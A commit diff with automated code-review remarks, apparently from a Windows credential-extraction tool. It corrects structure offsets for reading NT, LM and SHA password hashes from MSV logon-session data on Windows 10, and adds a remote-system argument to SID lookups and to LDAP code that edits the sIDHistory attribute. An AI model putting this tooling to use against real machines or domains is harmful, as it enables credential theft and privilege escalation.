[fix #46] MSV structure alignment for Windows 10 > LTSB (LSAISo & normal)
[enhancement] SID/Name lookup & LDAP query now with system arg (not only local/current domain)
parent
ddb93319a2
commit
9b325b893c
@ -25,7 +25,8 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
PWSTR name, domain;
|
||||
PSID pSid;
|
||||
SID_NAME_USE nameUse;
|
||||
PCWCHAR szName;
|
||||
PCWCHAR szName, szSystem = NULL;
|
||||
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szName, NULL))
|
||||
{
|
||||
@ -34,7 +35,7 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
kprintf(L"SID : %s\n", szName);
|
||||
if(IsValidSid(pSid))
|
||||
{
|
||||
if(kull_m_token_getNameDomainFromSID(pSid, &name, &domain, &nameUse))
|
||||
if(kull_m_token_getNameDomainFromSID(pSid, &name, &domain, &nameUse, szSystem))
|
||||
{
|
||||
kprintf(L"Type : %s\n"
|
||||
L"Domain: %s\n"
|
||||
@ -52,7 +53,7 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
else if(kull_m_string_args_byName(argc, argv, L"name", &szName, NULL))
|
||||
{
|
||||
kprintf(L"Name : %s\n", szName);
|
||||
if(kull_m_token_getSidDomainFromName(szName, &pSid, &domain, &nameUse))
|
||||
if(kull_m_token_getSidDomainFromName(szName, &pSid, &domain, &nameUse, szSystem))
|
||||
{
|
||||
kprintf(L"Type : %s\n"
|
||||
L"Domain: %s\n"
|
||||
@ -73,7 +74,10 @@ NTSTATUS kuhl_m_sid_query(int argc, wchar_t * argv[])
|
||||
{
|
||||
PLDAP ld;
|
||||
PLDAPMessage pMessage = NULL;
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, FALSE, &ld, &pMessage))
|
||||
PCWCHAR szSystem = NULL;
|
||||
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
|
||||
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, FALSE, szSystem, &ld, &pMessage))
|
||||
{
|
||||
if(pMessage)
|
||||
ldap_msgfree(pMessage);
|
||||
@ -101,7 +105,7 @@ NTSTATUS kuhl_m_sid_modify(int argc, wchar_t * argv[])
|
||||
if(IsValidSid((PSID) NewSid.bv_val))
|
||||
{
|
||||
NewSid.bv_len = GetLengthSid((PSID) NewSid.bv_val);
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to modify \'%s\' to \'", Modification.mod_type);
|
||||
kull_m_string_displaySID(NewSid.bv_val);
|
||||
@ -139,12 +143,12 @@ NTSTATUS kuhl_m_sid_add(int argc, wchar_t * argv[])
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"new", &szName, NULL))
|
||||
{
|
||||
if(ConvertStringSidToSid(szName, (PSID *) &NewSid.bv_val) || kull_m_token_getSidDomainFromName(szName, (PSID *) &NewSid.bv_val, &domain, NULL))
|
||||
if(ConvertStringSidToSid(szName, (PSID *) &NewSid.bv_val) || kull_m_token_getSidDomainFromName(szName, (PSID *) &NewSid.bv_val, &domain, NULL, NULL))
|
||||
{
|
||||
if(IsValidSid((PSID) NewSid.bv_val))
|
||||
{
|
||||
NewSid.bv_len = GetLengthSid((PSID) NewSid.bv_val);
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to add \'%s\' this new SID:\'", Modification.mod_type);
|
||||
kull_m_string_displaySID(NewSid.bv_val);
|
||||
@ -178,7 +182,7 @@ NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[])
|
||||
LDAPMod Modification = {LDAP_MOD_DELETE, L"sIDHistory", NULL};
|
||||
PLDAPMod pModification[2] = {&Modification, NULL};
|
||||
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to clear \'%s\': ", Modification.mod_type);
|
||||
dwErr = ldap_modify_s(ld, ldap_get_dn(ld, pMessage), pModification);
|
||||
@ -282,7 +286,7 @@ void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
|
||||
if((_wcsicmp(pAttribute, L"sIDHistory") == 0))
|
||||
{
|
||||
kull_m_string_displaySID(pBerVal[i]->bv_val);
|
||||
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse))
|
||||
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse, NULL))
|
||||
{
|
||||
kprintf(L" ( %s -- %s\\%s )", kull_m_token_getSidNameUse(nameUse), domain, name);
|
||||
LocalFree(name);
|
||||
@ -302,14 +306,14 @@ void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
|
||||
}
|
||||
}
|
||||
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PLDAP *ld, PLDAPMessage *pMessage)
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR system, PLDAP *ld, PLDAPMessage *pMessage)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
|
||||
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
|
||||
{
|
||||
if(kuhl_m_sid_getLdapAndRootDN(ld, &dn))
|
||||
if(kuhl_m_sid_getLdapAndRootDN(system, ld, &dn))
|
||||
{
|
||||
*pMessage = NULL;
|
||||
dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);
|
||||
@ -392,12 +396,12 @@ PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[])
|
||||
return filter;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PLDAP *ld, PWCHAR *rootDn)
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PCWCHAR system, PLDAP *ld, PWCHAR *rootDn)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
|
||||
if(*ld = ldap_init(NULL, LDAP_PORT))
|
||||
if(*ld = ldap_init((PWCHAR) system, LDAP_PORT))
|
||||
{
|
||||
if(*rootDn = kuhl_m_sid_getRootDomainNamingContext(*ld))
|
||||
{
|
||||
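Review bot: The new `PCWCHAR system` parameter of `kuhl_m_sid_quickSearch` and `kuhl_m_sid_getLdapAndRootDN` shadows the CRT `system()` function, and `ldap_init((PWCHAR) system, LDAP_PORT)` then has to cast its const away. Naming it `szSystem`, as the callers in this file already do, removes the shadowing, and the cast deserves a short comment such as `/* ldap_init takes a non-const host name */`. The same parameter name is used in the prototypes of the header section and in `kull_m_token_getNameDomainFromSID` / `kull_m_token_getSidDomainFromName` further down. `kuhl_m_sid_modify`, `kuhl_m_sid_add` and `kuhl_m_sid_clear` pass a literal `NULL`, so as far as these hunks show a `system` argument given to those commands is ignored without any message; a one-line comment at each call, e.g. `/* NULL: default server, the system argument is not honoured here */`, would make that explicit. All of these function bodies start or end outside the hunks.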
|
@ -21,7 +21,7 @@ NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[]);
|
||||
|
||||
void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage);
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PLDAP *ld, PLDAPMessage *pMessage);
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR system, PLDAP *ld, PLDAPMessage *pMessage);
|
||||
PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[]);
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PLDAP *ld, PWCHAR *rootDn);
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PCWCHAR system, PLDAP *ld, PWCHAR *rootDn);
|
||||
PWCHAR kuhl_m_sid_getRootDomainNamingContext(LDAP *ld);
|
@ -92,7 +92,7 @@ NTSTATUS kuhl_m_token_list_or_elevate(int argc, wchar_t * argv[], BOOL elevate)
|
||||
{
|
||||
if(kull_m_net_CreateWellKnownSid(type, pDomainInfo ? pDomainInfo->Sid : NULL, &pData.pSid))
|
||||
{
|
||||
if(kull_m_token_getNameDomainFromSID(pData.pSid, &name, &domain, NULL))
|
||||
if(kull_m_token_getNameDomainFromSID(pData.pSid, &name, &domain, NULL, NULL))
|
||||
{
|
||||
kprintf(L"%s\\%s\n", domain, name);
|
||||
LocalFree(name);
|
||||
|
@ -197,7 +197,7 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
|
||||
{
|
||||
kprintf(L"\t\tUser : ");
|
||||
if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL))
|
||||
if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL, NULL))
|
||||
{
|
||||
kprintf(L"%s\\%s", domain, name);
|
||||
LocalFree(name);
|
||||
|
@ -125,7 +125,7 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align2)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context)
|
||||
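Review bot: The `msv1_0_primaryHelper` table in this section is repeated with identical rows in a later file section, and the `MSV1_0_PRIMARY_CREDENTIAL_10` struct is likewise defined twice, so this commit has to make the same layout edit in four places. Nothing visible here ties the copies together, and a future change applied to only one of them would not be caught at compile time. If the two modules cannot share one header, a comment above each copy such as `/* keep in sync with the other msv1_0_primaryHelper definition */` would at least record the dependency. The rows also carry no comment saying which structure layout each one describes; a short trailing comment per row would make a changed offset easier to review.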
|
@ -44,8 +44,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
//BYTE align2;
|
||||
//BYTE align3;
|
||||
BYTE align2;
|
||||
BYTE align3;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
|
@ -51,7 +51,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align2)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
|
||||
|
@ -51,8 +51,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
//BYTE align2;
|
||||
//BYTE align3;
|
||||
BYTE align2;
|
||||
BYTE align3;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
|
@ -17,7 +17,7 @@ BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * p
|
||||
{
|
||||
if(GetTokenInformation(hToken, TokenUser, pTokenUser, szNeeded, &szNeeded))
|
||||
{
|
||||
if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse)) && pSid)
|
||||
if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse, NULL)) && pSid)
|
||||
result = ConvertSidToStringSid(pTokenUser->User.Sid, pSid);
|
||||
}
|
||||
LocalFree(pTokenUser);
|
||||
@ -32,20 +32,20 @@ PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse)
|
||||
return (SidNameUse > 0 && SidNameUse <= SidTypeLabel) ? SidNameUses[SidNameUse - 1] : L"unk!";
|
||||
}
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse)
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system)
|
||||
{
|
||||
BOOL result = FALSE;
|
||||
SID_NAME_USE sidNameUse;
|
||||
PSID_NAME_USE peUse = pSidNameUse ? pSidNameUse : &sidNameUse;
|
||||
DWORD cchName = 0, cchReferencedDomainName = 0;
|
||||
|
||||
if(!LookupAccountSid(NULL, pSid, NULL, &cchName, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
if(!LookupAccountSid(system, pSid, NULL, &cchName, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
{
|
||||
if(*pName = (PWSTR) LocalAlloc(LPTR, cchName * sizeof(wchar_t)))
|
||||
{
|
||||
if(*pDomain = (PWSTR) LocalAlloc(LPTR, cchReferencedDomainName * sizeof(wchar_t)))
|
||||
{
|
||||
result = LookupAccountSid(NULL, pSid, *pName, &cchName, *pDomain, &cchReferencedDomainName, peUse);
|
||||
result = LookupAccountSid(system, pSid, *pName, &cchName, *pDomain, &cchReferencedDomainName, peUse);
|
||||
if(!result)
|
||||
*pDomain = (PWSTR) LocalFree(*pDomain);
|
||||
}
|
||||
@ -56,20 +56,20 @@ BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain
|
||||
return result;
|
||||
}
|
||||
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse)
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system)
|
||||
{
|
||||
BOOL result = FALSE;
|
||||
SID_NAME_USE sidNameUse;
|
||||
PSID_NAME_USE peUse = pSidNameUse ? pSidNameUse : &sidNameUse;
|
||||
DWORD cbSid = 0, cchReferencedDomainName = 0;
|
||||
|
||||
if(!LookupAccountName(NULL, pName, NULL, &cbSid, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
if(!LookupAccountName(system, pName, NULL, &cbSid, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
{
|
||||
if(*pSid = (PSID) LocalAlloc(LPTR, cbSid * sizeof(wchar_t)))
|
||||
{
|
||||
if(*pDomain = (PWSTR) LocalAlloc(LPTR, cchReferencedDomainName * sizeof(wchar_t)))
|
||||
{
|
||||
result = LookupAccountName(NULL, pName, *pSid, &cbSid, *pDomain, &cchReferencedDomainName, peUse);
|
||||
result = LookupAccountName(system, pName, *pSid, &cbSid, *pDomain, &cchReferencedDomainName, peUse);
|
||||
if(!result)
|
||||
*pDomain = (PWSTR) LocalFree(*pDomain);
|
||||
}
|
||||
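Review bot: In `kull_m_token_getSidDomainFromName` the SID buffer is allocated with `LocalAlloc(LPTR, cbSid * sizeof(wchar_t))`, but `cbSid` is already the byte count returned by the sizing call to `LookupAccountName`, so the multiplication only over-allocates and makes the value read like a character count. `if(*pSid = (PSID) LocalAlloc(LPTR, cbSid))` is sufficient and matches the `cb` prefix. The sizing call and the fetching call now both go to the host named by `system`, so a one-line comment noting that the second call can still fail if the required sizes change in between would explain why `result` is re-checked. Both function bodies continue outside the hunks.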
|
@ -22,5 +22,5 @@ BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HAN
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse);
|
||||
PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
|